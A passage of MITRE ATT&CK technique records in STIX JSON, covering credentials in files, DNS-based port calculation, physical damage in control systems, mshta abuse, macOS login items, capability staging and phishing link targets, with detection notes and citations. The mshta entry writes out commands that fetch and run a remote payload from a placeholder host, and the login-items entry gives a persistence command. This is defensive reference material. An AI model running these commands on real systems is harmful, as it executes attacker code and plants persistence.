"IaaS", "Linux", "macOS", "Containers"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_system_requirements": ["Access to files"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--837f9164-50af-4ac0-8219-379d8a74cefc", "created": "2020-02-04T12:52:13.006Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/001", "external_id": "T1552.001"}, {"source_name": "CG 2014", "description": "CG. (2014, May 20). Mimikatz Against Virtual Machine Memory Part 1. Retrieved November 12, 2014.", "url": "http://carnal0wnage.attackresearch.com/2014/05/mimikatz-against-virtual-machine-memory.html"}, {"source_name": "Unit 42 Hildegard Malware", "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/"}, {"source_name": "Unit 42 Unsecured Docker Daemons", "description": "Chen, J.. (2020, January 29). Attacker's Tactics and Techniques in Unsecured Docker Daemons Revealed. Retrieved March 31, 2021.", "url": "https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/"}, {"source_name": "Specter Ops - Cloud Credential Storage", "description": "Maddalena, C.. (2018, September 12). Head in the Clouds. Retrieved October 4, 2019.", "url": "https://posts.specterops.io/head-in-the-clouds-bd038bb69e48"}, {"source_name": "SRD GPP", "description": "Security Research and Defense. (2014, May 13). MS14-025: An Update for Group Policy Preferences. Retrieved January 28, 2015.", "url": "http://blogs.technet.com/b/srd/archive/2014/05/13/ms14-025-an-update-for-group-policy-preferences.aspx"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "DNS Calculation", "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)\n\nOne implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--83a766f8-1501-4b3a-a2de-2e2849e8dfc1", "created": "2020-03-11T14:56:34.154Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1568/003", "external_id": "T1568.003"}, {"source_name": "Meyers Numbered Panda", "description": "Meyers, A. (2013, March 29). Whois Numbered Panda. Retrieved January 14, 2016.", "url": "http://www.crowdstrike.com/blog/whois-numbered-panda/"}, {"source_name": "Moran 2014", "description": "Moran, N., Oppenheim, M., Engle, S., & Wartell, R.. (2014, September 3). Darwin\u2019s Favorite APT Group [Blog]. Retrieved November 12, 2014.", "url": "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"}, {"source_name": "Rapid7G20Espionage", "description": "Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage Operations. Retrieved March 6, 2017.", "url": "https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2023-10-13T17:57:06.993Z", "name": "Damage to Property", "description": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828). \n\n\nThe German Federal Office for Information Security (BSI) reported a targeted attack on a steel mill under an incidents affecting business section of its 2014 IT Security Report. (Citation: BSI State of IT Security 2014) These targeted attacks affected industrial operations and resulted in breakdowns of control system components and even entire installations. As a result of these breakdowns, massive impact and damage resulted from the uncontrolled shutdown of a blast furnace. \n\nA Polish student used a remote controller device to interface with the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) (Citation: Bruce Schneier January 2008) Using this remote, the student was able to capture and replay legitimate tram signals. This resulted in damage to impacted trams, people, and the surrounding property. Reportedly, four trams were derailed and were forced to make emergency stops. (Citation: Shelley Smith February 2008) Commands issued by the student may have also resulted in tram collisions, causing harm to those on board and the environment outside. (Citation: Bruce Schneier January 2008)", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "impact"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--83ebd22f-b401-4d59-8219-2294172cf916", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0879", "external_id": "T0879"}, {"source_name": "Bruce Schneier January 2008", "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html"}, {"source_name": "BSI State of IT Security 2014", "description": "Bundesamt fr Sicherheit in der Informationstechnik (BSI) (German Federal Office for Information Security) 2014 Die Lage der IT-Sicherheit in Deutschland 2014 (The State of IT Security in Germany) Retrieved. 2019/10/30 ", "url": "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Publications/Securitysituation/IT-Security-Situation-in-Germany-2014.pdf?__blob=publicationFile&v=3"}, {"source_name": "John Bill May 2017", "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/"}, {"source_name": "Shelley Smith February 2008", "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-05-11T14:00:00.188Z", "name": "Mshta", "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["@ionstorm", "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", "Ricardo Dias"], "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Digital Certificate Validation"], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", "created": "2020-01-23T19:32:49.557Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218/005", "external_id": "T1218.005"}, {"source_name": "Cylance Dust Storm", "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf"}, {"source_name": "Red Canary HTA Abuse Part Deux", "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/"}, {"source_name": "FireEye Attacks Leveraging HTA", "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. Retrieved October 27, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html"}, {"source_name": "Airbus Security Kovter Analysis", "description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/"}, {"source_name": "FireEye FIN7 April 2017", "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"}, {"source_name": "Wikipedia HTML Application", "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", "url": "https://en.wikipedia.org/wiki/HTML_Application"}, {"source_name": "MSDN HTML Applications", "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", "url": "https://msdn.microsoft.com/library/ms536471.aspx"}, {"source_name": "LOLBAS Mshta", "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Login Items", "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the \u201cSystem Events\u201d process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application \u201cSystem Events\u201d to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--84601337-6a55-4ad7-9c35-79e0d1ea2ab3", "created": "2021-10-05T21:26:15.081Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/015", "external_id": "T1547.015"}, {"source_name": "Open Login Items Apple", "description": "Apple. (n.d.). Open items automatically when you log in on Mac. Retrieved October 1, 2021.", "url": "https://support.apple.com/guide/mac-help/open-items-automatically-when-you-log-in-mh15189/mac"}, {"source_name": "Adding Login Items", "description": "Apple. (2016, September 13). Adding Login Items. Retrieved July 11, 2017.", "url": "https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLoginItems.html"}, {"source_name": "SMLoginItemSetEnabled Schroeder 2013", "description": "Tim Schroeder. (2013, April 21). SMLoginItemSetEnabled Demystified. Retrieved October 5, 2021.", "url": "https://blog.timschroeder.net/2013/04/21/smloginitemsetenabled-demystified/"}, {"source_name": "Launch Services Apple Developer", "description": "Apple. (n.d.). Launch Services. Retrieved October 5, 2021.", "url": "https://developer.apple.com/documentation/coreservices/launch_services"}, {"source_name": "ELC Running at startup", "description": "hoakley. (2018, May 22). Running at startup: when to use a Login Item or a LaunchAgent/LaunchDaemon. Retrieved October 5, 2021.", "url": "https://eclecticlight.co/2018/05/22/running-at-startup-when-to-use-a-login-item-or-a-launchagent-launchdaemon/"}, {"source_name": "Login Items AE", "description": "Apple. (n.d.). Login Items AE. Retrieved October 4, 2021.", "url": "https://developer.apple.com/library/archive/samplecode/LoginItemsAE/Introduction/Intro.html#//apple_ref/doc/uid/DTS10003788"}, {"source_name": "Startup Items Eclectic", "description": "hoakley. (2021, September 16). How to run an app or tool at startup. Retrieved October 5, 2021.", "url": "https://eclecticlight.co/2021/09/16/how-to-run-an-app-or-tool-at-startup/"}, {"source_name": "hexed osx.dok analysis 2019", "description": "fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021.", "url": "http://www.hexed.in/2019/07/osxdok-analysis.html"}, {"source_name": "Add List Remove Login Items Apple Script", "description": "kaloprominat. (2013, July 30). macos: manage add list remove login items apple script. Retrieved October 5, 2021.", "url": "https://gist.github.com/kaloprominat/6111584"}, {"source_name": "objsee mac malware 2017", "description": "Patrick Wardle. (n.d.). Mac Malware of 2017. Retrieved September 21, 2018.", "url": "https://objective-see.com/blog/blog_0x25.html"}, {"source_name": "CheckPoint Dok", "description": "Ofer Caspi. (2017, May 4). OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic. Retrieved October 5, 2021.", "url": "https://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/"}, {"source_name": "objsee netwire backdoor 2019", "description": "Patrick Wardle. (2019, June 20). Burned by Fire(fox). Retrieved October 1, 2021.", "url": "https://objective-see.com/blog/blog_0x44.html"}, {"source_name": "objsee block blocking login items", "description": "Patrick Wardle. (2018, July 23). Block Blocking Login Items. Retrieved October 1, 2021.", "url": "https://objective-see.com/blog/blog_0x31.html"}, {"source_name": "sentinelone macos persist Jun 2019", "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", "url": "https://www.sentinelone.com/blog/how-malware-persists-on-macos/"}, {"source_name": "Launch Service Keys Developer Apple", "description": "Apple. (2018, June 4). Launch Services Keys. Retrieved October 5, 2021.", "url": "https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-10-19T22:01:05.551Z", "name": "Stage Capabilities", "description": "Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)\n\nStaging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to):\n\n* Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox)\n* Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019)\n* Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020)\n* Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "If infrastructure or patterns in malware, tooling, certificates, or malicious web content have been previously identified, internet scanning may uncover when an adversary has staged their capabilities.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as initial access and post-compromise behaviors.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "created": "2021-03-17T20:04:09.331Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608", "external_id": "T1608"}, {"source_name": "Volexity Ocean Lotus November 2020", "description": "Adair, S. and Lancaster, T. (2020, November 6). OceanLotus: Extending Cyber Espionage Operations Through Fake Websites. Retrieved November 20, 2020.", "url": "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/"}, {"source_name": "Netskope GCP Redirection", "description": "Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.", "url": "https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection"}, {"source_name": "Netskope Cloud Phishing", "description": "Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.", "url": "https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service"}, {"source_name": "ATT ScanBox", "description": "Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework Used with Watering Hole Attacks. Retrieved October 19, 2020.", "url": "https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks"}, {"source_name": "DigiCert Install SSL Cert", "description": "DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.", "url": "https://www.digicert.com/kb/ssl-certificate-installation.htm"}, {"source_name": "Gallagher 2015", "description": "Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as \u201cwatering holes\u201d. Retrieved January 25, 2016.", "url": "http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/"}, {"source_name": "Malwarebytes Heroku Skimmers", "description": "J\u00e9r\u00f4me Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.", "url": "https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku"}, {"source_name": "Dragos Heroku Watering Hole", "description": "Kent Backman. (2021, May 18). When Intrusions Don\u2019t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.", "url": "https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/"}, {"source_name": "FireEye CFR Watering Hole 2012", "description": "Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.", "url": "https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html"}, {"source_name": "Malwarebytes Silent Librarian October 2020", "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.", "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/"}, {"source_name": "Proofpoint TA407 September 2019", "description": "Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.", "url": "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-28T15:57:26.842Z", "name": "Link Target", "description": "Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. \n\nTypically, the resources for a link target will be an HTML page that may include some client-side script such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) to decide what content to serve to the user. Adversaries may clone legitimate sites to serve as the link target, this can include cloning of login pages of legitimate web services or organization login pages in an effort to harvest credentials during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003).(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) Adversaries may also [Upload Malware](https://attack.mitre.org/techniques/T1608/001) and have the link target point to malware for download/execution by the user.\n\nAdversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Malicious Link](https://attack.mitre.org/techniques/T1204/001).\n\nLinks can be written by adversaries to mask the true destination in order to deceive victims by abusing the URL schema and increasing the effectiveness of phishing.(Citation: Kaspersky-masking)(Citation: mandiant-masking)\n\nAdversaries may also use free or paid accounts on link shortening services and Platform-as-a-Service providers to host link targets while taking advantage of the widely trusted domains of those providers to avoid being blocked while redirecting victims to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect) In addition, adversaries may serve a variety of malicious links through uniquely generated URIs/URLs (including one-time, single use links).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally, adversaries may take advantage of the decentralized nature of the InterPlanetary File System (IPFS) to host link targets that are difficult to remove.(Citation: Talos IPFS 2022)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "resource-development"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Goldstein Menachem", "Hen Porcilan", "Diyar Saadi Ali", "Nikola Kovac"], "x_mitre_deprecated": false, "x_mitre_detection": "If infrastructure or patterns in malicious web content have been previously identified, internet scanning may uncover when an adversary has staged web content to make it accessible for targeting.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on other phases of the adversary lifecycle, such as during [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003), [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002), or [Malicious Link](https://attack.mitre.org/techniques/T1204/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--84ae8255-b4f4-4237-b5c5-e717405a9701", "created": "2021-03-17T20:35:08.429Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1608/005", "external_id": "T1608.005"}, {"source_name": "Netskope GCP Redirection", "description": "Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.", "url": "https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection"}, {"source_name": "Netskope Cloud Phishing", "description": "Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.", "url": "https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service"}, {"source_name": "URI Unique", "description": "Australian Cyber Security Centre. National Security Agency. (2020, April 21). Detect and Prevent Web Shell Malware. Retrieved February 9, 2024.", "url": "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF"}, {"source_name": "Kaspersky-masking", "description": "Dedenok, Roman. (2023, December 12). How cybercriminals disguise URLs. Retrieved January 17, 2024.", "url": "https://www.kaspersky.com/blog/malicious-redirect-methods/50045/"}, {"source_name": "Talos IPFS 2022", "description": "Edmund Brumaghin. (2022, November 9). Threat Spotlight: Cyber Criminal Adoption of IPFS for Phishing, Malware Campaigns. Retrieved March 8, 2023.", "url": "https://blog.talosintelligence.com/ipfs-abuse/"}, {"source_name": "Malwarebytes Silent Librarian October 2020", "description": "Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.", "url": "https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/"}, {"source_name": "URI", "description": "Michael Cobb. (2007, October 11). Preparing for uniform resource identifier (URI) exploits. Retrieved February 9, 2024.", "url": 